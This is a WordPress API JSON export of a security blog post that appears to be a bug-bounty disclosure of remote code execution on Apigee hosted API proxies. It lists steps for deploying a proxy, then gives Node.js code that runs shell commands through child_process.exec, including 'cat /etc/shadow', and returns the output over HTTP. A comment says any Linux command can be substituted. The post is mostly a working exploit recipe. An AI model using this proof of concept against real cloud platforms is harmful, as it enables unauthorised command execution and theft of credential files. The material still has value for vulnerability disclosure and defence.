{"id":94,"date":"2020-05-20T14:06:00","date_gmt":"2020-05-20T14:06:00","guid":{"rendered":"https:\/\/piratesecurityblog.com\/?p=94"},"modified":"2021-12-20T14:06:43","modified_gmt":"2021-12-20T14:06:43","slug":"apigee-api-proxies-code-exec","status":"publish","type":"post","link":"https:\/\/piratesecurityblog.com\/?p=94","title":{"rendered":"Apigee API proxies code exec"},"content":{"rendered":"\n

Summary: RCE on Apigee API proxies
<\/em>
Steps to reproduce:<\/em><\/p>\n\n\n\n

1.- open apigee.com login in with your account<\/em><\/p>\n\n\n\n

2.- navigate to Develop > API proxies and click \u201c+Proxy\u201d button<\/em><\/p>\n\n\n\n

3.- select hosted target: \u2013 put any name (in this case \u201crce\u201d) \u2013 select \u201cQuick start\u201d radio button and the \u201cNext\u201d button \u2013 then \u201cNext\u201d again, and \u201cNext\u201d one more time \u2013 \u2013 check \u201cprod\u201d checkbox and clic \u201cCreate and Deploy\u201d Button \u2013 after the deploy, copy the url and clic on \u201cEdit proxy\u201d<\/em><\/p>\n\n\n\n

4.- select \u201cDevelop\u201d tab, then clic the \u201cindex.js\u201d file in \u201cResources > hosted\u201d section, and replace the content of that file with and clic on \u201cSave\u201d and \u201cSave\u201d one more time:<\/em><\/p>\n\n\n\n

var http = require('http');\nconst { exec } = require('child_process');\nvar svr = http.createServer(function(req, resp) {\n  resp.setHeader('Content-Type', 'application\/json');\n    \/\/ you can put any linux command in exec function \n    exec('echo \"- - - - id - - - -\";id; echo ;echo \"- cat \/etc\/shadow - \";cat \/etc\/shadow' <\/strong>, \n    \t(error, stdout, stderr) => {\n        \tresp.end(stdout + '\\npoc by @omespino');\n    \t}\n    );\n});\nsvr.listen(process.env.PORT || 3000, function() {});<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
Summary: RCE on Apigee API proxiesSteps to reproduce: 1.- open apigee.com login in with your account 2.- navigate to Develop > API proxies and click \u201c+Proxy\u201d button 3.- select hosted target: \u2013 put any name (in this case \u201crce\u201d) \u2013 select \u201cQuick start\u201d radio button and the \u201cNext\u201d button \u2013 then \u201cNext\u201d again, and \u201cNext\u201d … Continue reading Apigee API proxies code exec<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/94"}],"collection":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=94"}],"version-history":[{"count":1,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/94\/revisions"}],"predecessor-version":[{"id":95,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=\/wp\/v2\/posts\/94\/revisions\/95"}],"wp:attachment":[{"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=94"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=94"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/piratesecurityblog.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=94"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}